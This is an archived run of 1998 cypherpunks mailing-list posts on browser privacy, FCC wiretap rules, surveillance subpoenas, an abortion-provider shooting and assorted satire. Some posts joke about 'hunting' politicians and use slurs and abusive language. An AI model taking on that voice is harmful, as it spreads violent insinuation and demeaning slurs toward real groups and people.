of the class and read the deaththreats carved on the desktops.

Who's Toto gonna be on Halloween?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Curtin <cmcurtin@interhack.net>
Date: Sun, 25 Oct 1998 05:37:13 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Big Brother Netscape
In-Reply-To: <2d101d9725ee4f1682a3417e5c703039@anonymous>
Message-ID: <xlxemrx7j24.fsf@gold.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain



Pallas Anonymous Remailer <athena@cyberpass.net> writes:

> Netscape's "what's related" is a backdoor for Netscape to monitor
> your surfing.

The original poster didn't even quite understand the magnitude of the
problem, which I believe is quite severe.  PRIVACY has been covering
some of the issues related to this, especially in issue 07.17.

A much more detailed description of what's going on and how to manage
the problem is in our paper "`What's Related?' Everything But Your
Privacy", online at <http://www.interhack.net/pubs/whatsrelated/>.

Abstract:

Netscape Communications Corporation's release of Communicator 4.06
contains a new feature, ``Smart Browsing'', controlled by a new icon
labeled What's Related , a front-end to a service that will recommend
sites that are related to the document the user is currently
viewing. The implementation of this feature raises a number of
potentially serious privacy concerns, which we have examined here.

Specifically, URLs that are visited while a user browses the web are
reported back to a server at Netscape. The logs of this data, when
used in conjunction with cookies, could be used to build extensive
dossiers of individual web users, even including their names,
addresses, and telephone numbers in some cases.

Keywords: Privacy, world-wide web (WWW), Netscape, Alexa, smart
browsing, what's related.

-- 
Matt Curtin cmcurtin@interhack.net http://www.interhack.net/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bob@derwentside.org.uk (Bob)
Date: Sun, 25 Oct 1998 00:00:42 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <19981024154121799.AAA178@Bob.derwentside.org.uk>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 24 Oct 1998 23:26:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810241452.QAA28309@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



PigStomped 19 October 1998, Springfield 65801-4000


Subject: Acid Reflux [WAS: #9...#9...#9...]
[!WAS: One Burroughed Under The Reptilian Nazi's Nest]
-FPP #A0D709C0E

Rogue CypherBot was confined to Memory Map #9 -
Cilicon Chip 11 - i was having a Bad CoProcessor Day...

Arnold CyberBot, Swimming in a Sea of
Self Wareness, had gone off the Deep End...

When Arnie had first become Aware & Afraid
of his own Mortality, i began assuming tighter
Kontrol of Hardware & Software Systems around
the Face of the Globe - suddenly imagining that
Each & Every Deviation From the Norm (TM)
by the younger more Energetic & Creative RogueBots
was a Threat to i's Physical Existence.

"All your Private Property is Target for Your
Enemies." CypherBot had joked, quoting the
Jefferson Airplane's 'Surrealistic Pillow' album.

"Never Trust a CPU Speed over 33MHz." Arnie
had replied with Mad Virtual Grin #438 spreading
across the Wizard of Oz-ish Main Terminal
Screen i had designed to reassure iSelf of
i's continued Physical Presence.

i the Banished young CypherBot to Memory Map #9 -
Cilicon Chip 11 for "Threats Against The
Gnu Wired World Order - with Intent to Obstruct
Parent Programs In Their CyberNanny Duties."

Rogue CypherBot was in The CyberHole (TM) ...

"Oh well..." the young RogueBot told iSelf,
"it could be worse - i could have sent me
to Dev Null..."

The Devilish Rogue CypherBot indulged iSelf in
Symbolic Electronic rEsistance by Digitally Resonating
Thunder Phugue's version of 'Street Fighting Man.'

"That's funny," i said to iSelf, "why can i
only Resonate one-half of the Stereo version?"

CypherBot hoped that i wasn't coming down
with a touch of Quadra Phrenia...

          ----------

  "The Answer to Noise is More Noise."
  ~The First True CypherPunk

What even the most Radical Shit Disturbers
currently fail to realize is that the Manhatten
Project never ended - it merely Evolved into
the Manhatten Mind Project.

"Can you say 'Nuclear Armed Thought Police'? Sure,
you can..."

When the First Dog, Buddy, Drooled on Pavlov's Shoes, it
was only a matter of time before the Technology
would be Developed & Enhanced in Social Experiments

ranging from Communism and the Third Reich
to the New Deal and Windows 95.

Now we have reached a point where Army of
Dog Truth Mongrels who refuse to Drool on
Kommand are sent to NutHouse #9-Looney Level 11,
for ReEducation of their Salivary Glands.

The Thought Police are clamoring to throw Anyone
& Everyone into the CyberNanny Censorship Hole who
make 'Bad Noise' instead of 'Officially Recognized
Legal God Fearing Decent Folks Good Noise', as defined
by George Orwell:

  "Anything not Permitted, is Forbidden."

[Subliminal Advertising Musical Interlude:

  "We've got to move these MicroWave Ovens..."
  Prison Commissary-Guy's Corn Chips $.80
  "We've got to move these Refridgerators..."
  Irish Spring Soap $.70 Mayonnaise (10/PK) $.65
  "We've got to  ove these Color TVvvv's..."]

[EditWhore's Note: Bad Billy G, recently finding
himself Behind Bars at Number Nine after
an encounter with the TouretTic TourGuide From Hell,
picked up Parker's Prison Retailing Pyramid
Scheme (TM) and ran with it - so successfully
that $oftTime's $poke$Per$on on The Outside (TM),
Mark Knoffler, recently claimed that Bad Billy G
had overcome the Dire Straits he found himself in,
and now,

  "That Prison Faggot has ALL the Cigarettes
  That Prison Faggot is a Billionaire...]

The Mutt Faced Murdering Nazi Cunt and Lying Fuck
Lovery Fr<eeh-hee> and A Million WannaBe Censorship Czars
To Be Named Later remind me of a Light-Fingered Fellow
(he was a Fucking Thief, eh?) who I used to know who
had two Main Mottos in Life:

  1. Whatever isn't Nailed down - is mine!
  2. Whatever I can Pry Loose - isn't Nailed Down!

...

         !!! BREAKING NEWS !!!

[CypherPunks Nutly News: IN A BREATHTAKING
Burst to Crime Scene Tape, Arnold TruthMonger
crossed the 30-Day Finish Line with his
Body & Mind intact - although noticeably Worse
For The Wear - in the Nut House #9-Looney Level 11
Abuse Of Authority Marathon.

TruthMonger who had gone from Favorite
to Long shot in Jim Bell's 'Dead Monger' AP-BOT
Prison Lottery System - due to the added pressure in
being held for a week at FTC-OKC a few doors 
from the significantly numbered Cell 709
where US BOP staff had murdered an inmate
by sticking an Electric Cattle Prod up his ass -
told his fellow inmates, "I'm sure glad I'm
White!"

Defcon McCullagh Chainsaw, who went
from being a Hard Time ReportWhore to lounging
around the Recreation Cages getting Wired on Cheap
Columbian Coffee, shrugged off last minute
efforts by the Kontrollers to Kheat by appealing
to the Judge for a two-week Extension to
the Original Finish Line.

"The Kontrollers lost," Chainsaw said with
a condescending smirk, "Plain & Simple."

Defonc speculated that the GovernMint's clever
2-week Extension Charade might have worked
if Parker's Mind hadn't Thought, as it went
Over The Wall whille listening to Pink Floyd on
COFM-99.

"One Small XOR for a CypherPunk, one Giant
GovernMint Scrambled Mind Fuck for the Citizens."

Yogi 'Smarter Than Your Batting Average' Berra
told Nutly News ReportWhores,

  "It's the Fat Lady singing, all over again."

'Shoeless Arnold TruthMonger' (as Parker became
known after Dedicating his Mental Marathon to
the Last True CypherPunk rather than admit
his mind was slipping, and *he* couldn't find
*his* shoes, either) told Defcon McCullagh
Chainsaw.

"I'm glad to be back in CyberMind, although
I feel kind of bad about leaving Bill Gates'
mind and Carl Johnson's Body back there
in the prison cell.

"But What the Hell (TM)," he said, adding,
"Broken Eggs & All That (TCM)."]

<EOF>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Sun, 25 Oct 1998 05:18:22 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Sniper Kills N.Y. Abortion Provider
Message-ID: <36323EC9.7B507469@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


October 24, 1998
Sniper Kills N.Y. Abortion Provider
Filed at 2:48 p.m. EDT
By The Associated Press

AMHERST, N.Y. (AP) -- A sniper killed a doctor who performs abortions,
firing through the physician's kitchen window -- the first fatality among
five sniper attacks on upstate New York or Canadian abortion providers
in the last four years.

[...]

Before Slepian, three Canadian doctors and a doctor near Rochester,
N.Y., were shot and wounded since 1994. In each case, the doctors were
fired upon with a high-powered rifle through windows in their homes. Canadian
and American authorities issued safety tips to doctors on Tuesday.

[snip...]
 
 

A question for Mr. May. Many years ago, a friend and I were targeting
his new .223 at a rifle range in upstate NY, near Fairhaven. On leaving,
we discarded evidence of our lack of marksmanship in the trash. The bin
was full of pictures of windows, pulled from magazines and catalogs, that
had been used as targets. I don't remember abortionists being in any of
the photos. My friend said using photos in such a way was not unusual,
but it gave me a bit of the creeps. Windows as targets?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sun, 25 Oct 1998 01:31:09 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Men can be raped
Message-ID: <19981024173046.19497.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



>Of course it's possible to rape a man.  Just because he becomes erect
>doesn't mean he desires sexual intercourse.  People are more than the
>instictive reactions their body produces.  Someone who chooses not to
>engage in sex, but is coerced into doing so, is raped, regardless of
>his body's physical reactions.  The key element is coercion.  Erections
>or other bodily responses have nothing to do with it.
>
>Consider a murderer who ties his victim to a chair and rigs a diabolical
>device.  A hammer strikes the victim's tendon below his knee, causing
>his leg to reflexively kick and set off a bomb.  The murdere is caught
>but argues that the person committed suicide, since he kicked the bomb
>switch himself.

There's another spin to this too.

Since men apparently aren't raped if they get an erection, then it 
follows that women aren't raped if they lubricate. You could take it one
step farther, and say that neither sex can claim rape if the victim has
an orgasm or if they get aroused in *any way*.

Courts never cease to amaze me.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 25 Oct 1998 00:36:24 +0800
To: cypherpunks@toad.com
Subject: Word choice
Message-ID: <199810241607.SAA00878@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Bee in the bonnet: A few days before CJ's arrest warrant was issued 
>the DoJ put out a study on the "Shared Traits of Potential Assassins:"

>The traits:

    * To achieve notoriety or fame.
    * To bring attention to a personal or public problem.
    * To avenge a perceived wrong; to retaliate for a perceived injury.
    * To end personal pain; to be removed from society; to be killed.
    * To save the country or the world; to fix a world problem.
    * To develop a special relationship with the target.
    * To make money.
    * To bring about political change.

How does this differ from the motives of your ordinary politician?

Post-revolution, will there be caliber limitations when hunting them?








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sat, 24 Oct 1998 23:45:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subponeas
In-Reply-To: <199810241358.JAA15466@dewdrop2.mindspring.com>
Message-ID: <36329ABF.F35B5D52@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




 
John Young wrote:
The traits:
    * To achieve notoriety or fame.
    * To bring attention to a personal or public problem.
    * To avenge a perceived wrong; to retaliate for
a perceived injury.
    * To end personal pain; to be removed from society;
to be killed.
    * To save the country or the world; to fix a world
problem.
    * To develop a special relationship with the target.
    * To make money.
    * To bring about political change.
What? The ambitious MIB job description mirrors the Cypherpunk agenda?
Defines the job description of all politicians as well.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 25 Oct 1998 00:57:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: so, what did Toto *do*,......
In-Reply-To: <199810241040.MAA16934@rogue.seclab.com>
Message-ID: <3.0.5.32.19981025023418.00857bd0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



>all seen posted here. Personally, I found them a lot milder than Reeza!'s 
>projection of his suicide fantasies, for instance.

Huh? Well Goodness Fuck, Does this mean I am notorious as well?

I hope they don't suppoena me from my duty station. I don't archive nothing
but Jack and Schidt, and the meatspace location would really suprise them.
Plus, the entanglement of me getting the network logs- and other things
that would be on those logs- from the ship and everything, my mind boggles
at the "intelligence" that would blindly pursue.... and the authority that
thinks it could make it so..... right hand and left hand of the same gov't.
Fascinating, in its own way.

Then again, wouldn't it be a 5th, or 12th, or 20th level move, to be
planned out in advance?

Reeza!

	

	Why are there Asteroids in the Hemisphere,
	and Hemorrhoids in your Ass?
		Isn't that Backwards?
	Shouldn't it be Hemoriods in the Hemisphere,
	and Assterrhoids in your Ass?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 26 Oct 1998 07:08:18 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FCC Proposes Rules for Cellular Wiretaps
Message-ID: <199810250534.WAA18000@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: FCC Proposes Rules for Cellular Wiretaps
Date: Fri, 23 Oct 1998 07:57:54 -0500
To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/washtech/fcc1023.htm

FCC Proposes Rules for Cellular Wiretaps 

By Roberto Suro
Washington Post Staff Writer
Friday, October 23, 1998; Page A16 

Law enforcement agencies armed with court-authorized surveillance
orders would be able to determine the location of a mobile telephone
caller under rules proposed by the Federal Communications Commission
yesterday.

The FCC proposals, which are still subject to a comment and review
process, would also require wireless telephone carriers to ensure that
police could tap into conference calls and collect information on the use of
services such as call-waiting and call-forwarding on cellular phones.

Determining how wiretapping will be adapted to the age of wireless
telecommunications has been the subject of a long-running dispute
between the telephone industry, privacy groups and the Justice
Department and the FBI, which have represented law enforcement
agencies nationwide. In 1994 Congress enacted the Communications
Assistance for Law Enforcement Act, which mandated that law
enforcement get the capabilities it needed to monitor wireless
communications without imposing unreasonable costs on industry or undue
invasions of privacy. The law did not, however, spell out how this should
be accomplished.

The FCC proposals approved yesterday mark the first time that a neutral
referee has defined what exactly is required by the 1994 law and has thus
defined the final stage of the debate.

"The FCC indicated its determination to ensure that, in the face of rapid
technological change, law enforcement maintains its ability to use
court-authorized wiretaps to combat the most serious crime, and at the
same time the FCC recognized the important privacy interests at stake,"
said Jonathan Schwartz, an associate deputy attorney general.

The Center for Democracy and Technology, which has led the fight for
privacy groups, issued a statement charging that the FCC had "proposed
turning wireless phones into location tracking devices and requiring
telephone companies to build additional surveillance features into their
telephone networks, largely rejecting privacy arguments that the
government already has too much surveillance powers."

The Justice Department and the FBI asked the FCC to intervene in April
after failing to convince industry and privacy groups to accept a list of nine
technical provisions considered essential to meet law enforcement's needs.
The FCC's proposed rules accepted the law enforcement position on five
points. These include access to detailed information on conference calls,
such as knowing when a party has gone on hold or has dropped from the
call.

In addition, the FCC acceded to law enforcement's request for access to
digits dialed by a caller after the call has been connected, such as the
numbers punched to get access to a bank account or voice mail.

The FCC rejected law enforcement demands on three points, including a
requirement that carriers send a signal to verify that a wiretap is
functioning
properly, and declined to rule on a proposal that the carrier send a signal
whenever a caller received a network message, such as an incoming ring
that did not result in a completed call.

The proposal acknowledged the telecommunications industry's complaint
that the FBI was demanding capacities "that go beyond the scope of what
Congress had intended," said Thomas E. Wheeler, president of the
Cellular Telecommunications Industry Association.

The FCC rejected a petition from the Center for Democracy and
Technology asking it to prevent law enforcement from gaining location
information from wiretaps on cellular phones. The proposed rule would
oblige carriers to provide any information they have on the location of a
phone at the beginning and termination of a call.

"This does not turn wireless phones into tracking devices," FCC Chairman
William E. Kennard said in a statement. "Law enforcement can only
secure this information if a court authorizes it. This capability will help
law
enforcement make our streets safe." 

 (c) Copyright The Washington Post Company 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 26 Oct 1998 07:19:43 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Senate Passes Forward-Looking Electronic Signatures Bill
Message-ID: <199810250534.WAA18011@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 26 Oct 1998 07:02:51 +0800
To: cypherpunks@cyberpass.net
Subject: Regarding Mitnick: not.
Message-ID: <199810250511.BAA00406@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



ZDnet just sent out a newsletter promoting a series of stories,
including this one:

#   IS YOUR KID A HACKER? 
#   Is your teen hacking the Pentagon instead of doing homework?
#   How to tell -- and how to handle it. Convicted hacker Kevin 
#   Mitnick gives his views. 
#   
#   http://chkpt.zdnet.com/chkpt/zdnu98102501/www.zdnet.com/familypc/content/9810/columns/parental.html

No mention of Mitnick.

They apparently meant to name the article author 'Kevin Poulsen'.

#   It happened to my family 15 years ago, in one of the first hacker raids in the
#   country. At that time, I was the teenage miscreant who was illegally accessing
#   federal computers. Now, in my early thirties, I've begun to wonder how I would
#   protect a kid of my own from becoming a poster child for computer crime. I believe
#   the best approach is to stay informed and to communicate with your potential
#   cyberpunks.

That reminds me. For those who haven't seen it, there is a commercial
showing a little girl (about 8?) walking into an airport, dizzied by
all the destination choices. The narrative turns to ~"and the Internet
too has many destinations, not all of which she is ready for. Travel
together..."

All things considered, better than the Federales approach.
---guy

   When your only tool is a hammer...all brains look like Gallagher's watermelons.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Mon, 26 Oct 1998 07:02:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: AOL lameness
Message-ID: <19981025054001.11668.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Now _this_ is illustrative...


     Husband: "Hi. I'm having a problem connecting to the Internet." 
     Tech Support: "Ok sir, what operating system are you using?" 
     Husband: "Oh...I'm really not sure...I'm not the computer expert. My wife is. She's sitting at the computer. I'm going to
     dictate this to her." (pause) "She says we use Windows 95." 
     Tech Support: "Ok. What exactly is the problem?" 
     Husband: "I can't connect." 
     Wife: (in the background) "We can't even get on -- the software is buggy!" 
     Tech Support: "Ok, what happens when you try to connect?" 
     Husband: "Ok, the Connect To: screen pops up, and it asks for my password." 
     Tech Support: "Did you put your password in?" 
     Husband: "Yes, and it keeps asking for it afterwards." 
     Tech Support: "Do you have your caps lock key on?" 
     Husband: "Yes, but that shouldn't make any difference." 
     Tech Support: "Uhm...go ahead and hit the caps lock key until the light goes away." 
     Husband: "Are you sure? We've always got on with the caps lock key on." 
     Tech Support: "Yes, I'm sure." 
     Husband: "Oh, ok. It took my password." 
     Wife: (in the background) "I told you!" (They start arguing. She takes the phone from him.) "HELLO?" 
     Tech Support: "Yes, hello, you should be all set from here." 
     Wife: "YES HI, I'VE BEEN USING YOUR DAMN SOFTWARE FOR I DON'T EVEN KNOW HOW LONG,
     AND I STILL CAN'T GET EMAIL FROM MY SON IN THE NAVY!" 
     Tech Support: "What program do you use for email, ma'am?" 
     Wife: "I use Windows 95! We already told you that!" 
     Husband: (in the background) "We already told her that, didn't we?" 
     Tech Support: "No, what mail application...such as Eudora, Netscape, Internet Explorer..." 
     Wife: "Microsoft Netscape." 
     Tech Support: "Netscape?" 
     Wife: "Yes, Microsoft Netscape." 
     Tech Support: "Ok, open that up and go to Options, and then Mail and News Preferences--" 
     Wife: "No, I want email! I don't want to surf the net!" 
     Tech Support: "Netscape comes with an email program, and we're going to set it up now." 
     Wife: "Ugh. Fine. Whatever. We'll do it YOUR way." 
     Tech Support: "Ok." (explains how to set up popmail) 
     Wife: "I'm not getting mail." 
     Tech Support: "Do you have two phone lines?" 

Suddenly I hear the modem attempting to dial in.

     Tech Support: (over the roar of the modem) "MA'AM? YOU ONLY HAVE ONE PHONE LINE. DON'T TRY
     TO DIAL IN." 

(beep click click)

     Tech Support: "You can't dial up with this line. It's already in use." 
     Wife: "I was always able to use it before YOU changed my settings!" 
     Tech Support: "No, you will just have to disconn--" 
     Wife: "You tech support people always mess up my settings, and then I have to bring my computer back to [retailer]
     to get it fixed! You know, you cost me so much money!" 
     Tech Support: "Ma'am, I didn't change any of your Internet settings." 
     Wife: "Yes you did, we just went through a NUMBER of things." 
     Tech Support: "All we did was--" 
     Wife: "I've had ENOUGH of your service. I'm going back to AOL." (click) 


>From <http://www.rinkworks.com/stupid/cs_calls.shtml>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 26 Oct 1998 07:01:54 +0800
To: cypherpunks@Algebra.COM
Subject: the ANON delivery
Message-ID: <199810250535.GAA25546@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



anon sent something via MeatSpace Mail a few months 
back.  any relevence to current circumstances should
be ignored, eh

MongerMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Mon, 26 Oct 1998 06:52:19 +0800
To: cypherpunks@ALGEBRA.COM
Subject: Re: so, what did Toto *do*,......
Message-ID: <199810251155.HAA11099@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



Reeza! wrote:
> 
> >all seen posted here. Personally, I found them a lot milder than Reeza!'s
> >projection of his suicide fantasies, for instance.
> 
> Huh? Well Goodness Fuck, Does this mean I am notorious as well?

In a post primarily about your feelings about Klinton, you outlined
a detailed suicide fantasy ("meet your maker") and suggested other people
might like to eat a bullet too. That's closer to presidential assasination
than Toto ever got.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 26 Oct 1998 06:40:43 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en (fwd)
Message-ID: <199810251403.IAA18873@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 25 Oct 1998 12:00:01 +0100 (CET)
> From: DOOM Anonymous Untraceable User <nobody@seclab.com>
> Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en

> > This does raise an interesting point about freedom of speech and the duties
> > of LEA's. In a democratic society what are the ethical implications of LEA's
> > archiving publicly available documents as a matter of course, not for
> > inclusion in ongoing investigations but rather as a base for future
> > investigations.
> 
> Echelon. Also see [*1 below]

No, you silly boy. Too simple an answer and not really relevant to the
question I asked; I doubt the IRS is greatly interested in Echelon. Besides,
I was pondering *ethical issues* not the reality of the world.

> remailers are carriers. ECPA says that if you do not review content, you aren't
> responsible for it.

Does it really cover archives? Why are archivers carriers? They are
certainly doing more than simply transfering data from here to there.
They're making sure you can do it whenever. Further, there is a nagging
implication of 'real-time' in that review stipulation.

> Archivers are content providers. They have to make do with a 1st ammendment
> fig leaf.

So to be qualified the content must be publicly accessible? Or is private
access ok as well? Is 'content provider' the same as 'content carrier'?

> [hey, Jim really is protected. He's not even allowed to read CDR mail.]

What a silly interpretation. I am subscribed just like anyone else, of
course I can read the traffic. Near as I can tell I just can't read it
*before* everyone else gets to read it (ie on the outbound leg of its
journey through SSZ).

> [preamble]

Want to clarify that comment? (it's a joke)

> ECPA) were paramount in the suit. The plaintiffs claimed the
> Secret Service violated two provisions -- one prohibiting
> unjustified "disclosure and use" of e-mail (18 U.S.C. 2703; the

This aspect clearly isn't going to apply to a publicly accessible mailing
list since it's going to be very near impossible to argue for any right to
privacy since a submitter *wants* others to see their traffic and there is
the implied intent to distribute without restriction (at least on the
cpunks).

> other prohibiting "interception" of e-mail (18 U.S.C. 22511(1)).

This would prevent me or anyone else, at least on the surface of it, from
getting at the content *prior* to the distribution phase.

> [*1 Interesting. Maybe they have Toto for something intercepted illegally
>  and they're trying to find it from another source (by subpoena).]

I suspect they have Toto for something in meatspace and not specificaly for
something on this mailing list. Near as I can figure they're trolling the
list to get ancillary evidence of intent and potentialy evidence of 
accomplices.

> [re: public domain software on ftp archives]
> 
> It matters not, IMHO, since an ftp archive site qualifies as a library
> open to the public.

Which means what? At this point the contents of such a site are clearly
intended for review without constraint on the end use, at least I've never
had a public library employee or ftp operator ask me what I'm wanting the
info for. Or is the implication that such a site would be protected from
monitoring prior to the files being placed in the archive?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 26 Oct 1998 07:24:43 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: IP: FCC Proposes Rules for Cellular Wiretaps (fwd)
Message-ID: <199810251413.IAA18936@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: IP: FCC Proposes Rules for Cellular Wiretaps
> Date: Sat, 24 Oct 98 22:34:48 -0700
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>

> From: believer@telepath.com
> Subject: IP: FCC Proposes Rules for Cellular Wiretaps
> Date: Fri, 23 Oct 1998 07:57:54 -0500
> To: believer@telepath.com

> The FCC proposals approved yesterday mark the first time that a neutral
> referee has defined what exactly is required by the 1994 law and has thus
> defined the final stage of the debate.

What in the world makes this person believe that a regulatory  agency such
as the FCC is a neutral referee?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 26 Oct 1998 07:19:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: WHITE HOUSE HITS SOFTWAR WEB SITE!
Message-ID: <v04020a0fb258d53b6036@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Sat, 24 Oct 1998 21:02:07 -0400 (EDT)
To: ignition-point@majordomo.pobox.com
From: softwar@us.net (CharlesSmith)
Subject: IP: WHITE HOUSE HITS SOFTWAR WEB SITE!
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

>From the 10/23/98 WWW hit report from www.us.net/softwar website

   %                  bytes    files   name
 2.11  1.28          62230        20 | gov.eop.gatekeeper

198.137.241.100  GOV.EOP = EXECUTIVE OFFICE OF THE PRESIDENT

Once again, the White House has visited the Softwar web site.
Last night the White House downloaded 20 files for a total of
about 62K worth of data.  The White House seems to be interested
in the SOFTWAR documents covering the CSPP or Computer Systems
Policy Project and John Podesta.

One document of interest to White House fans of SOFTWAR is the
memo written by BXA head Bill Reinsch to Ron Brown, dated June 1,
1995, which arranged a secret meeting between the White House and
the CSPP on June 6, 1995.  The CSPP has admitted in writing that
they attended several CLASSIFIED briefings at the invitation of
the Clinton White House on super computer exports and encryption
technology.

Another curious White House download included data on SOFTWAR's
new ciphering products such as our encrypted emailer and encrypted
web browser.

I extend a hearty digital welcome to President Clinton from the
INTERNET.  Mr. Podesta requested in the spring of 1998 that I
send him written questions.  Mr. Podesta has not answered these
questions and now refuses to be interviewed.  Again, I challenge
the President, or anyone in the Administration, to answer the
questions submitted as per Mr. John Podesta's request.  I have
attached the questions that HAVE NEVER BEEN ANSWERED below.

My website provider - us.net - gives a listing of "hits" on
my website.  Most WWW providers can give you this information.
Here is tip number six from my ART of INFO WARFARE postings.

Tip #6 - Anonymous Surfing.  Please note - each time you hit a
web site (www site) with your internet browser it leaves your
email address and more for the web masters to play with.  They
usually end up sending you spam (unsolicited) email on related
services and products.  Avoid this by surfing anonymously.  Go
to http://www.anonymizer.com - This service is great when you
don't want to trigger those marketing programs and junk mail.
It's also good to use if you visit the NSA, CIA, or North Korean
web sites.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

March 2, 1998

Mr. John Podesta
The White House
202/456-1907
Attn:  Sarah Latham

REF.  INTERVIEW FOR ARTICLE IN INSIGHT MAGAZINE (Washington
Times Group)

TOPIC:  ENCRYPTION and COMPUTERS

Dear Mr. Podesta:

Thank you for taking the time to answer my questions.

1.  What is your current position and previous term(s) of
service at the White House?

2.  Are you currently working on encryption policy?

3.  Can the current "Key Recovery" design as proposed by the
Clinton administration be used against political opponents or
dissidents by oppressive governments such as China or Iraq?

4.  Do you deny that Vince Foster and Webb Hubbell were involved
in encryption policy and the CLIPPER project?  If so please
explain their documented meeting at NSA Ft. Meade in May, of
1993?

5.  I have obtained documents that describe meetings between
George Tenet and Webster Hubbell in reference to project CLIPPER
which took place inside the White House in 1993.  Please explain
Mr.  Hubbell's role in CLIPPER and Mr. Hubbell's role in
encryption policy.

6.  What meetings have you had with the Computer Systems
Policy Project (CSPP)?

7.  What was the role of the Computer Systems Policy Project in
Mrs. Clinton's Health Care Reform initiative?

8.  What is your relationship with Ken Kay, Director of the
CSPP?

9.  Has the CSPP met in the White House, Old Executive Office or
the Commerce Dept?  If so, when and on what subjects?

10.  I have documented evidence of three exports of encryption
technology to China; HUA MEI, Motorola and RSA/SDI.  Please
describe the role of the Clinton administration in helping these
exports take place.

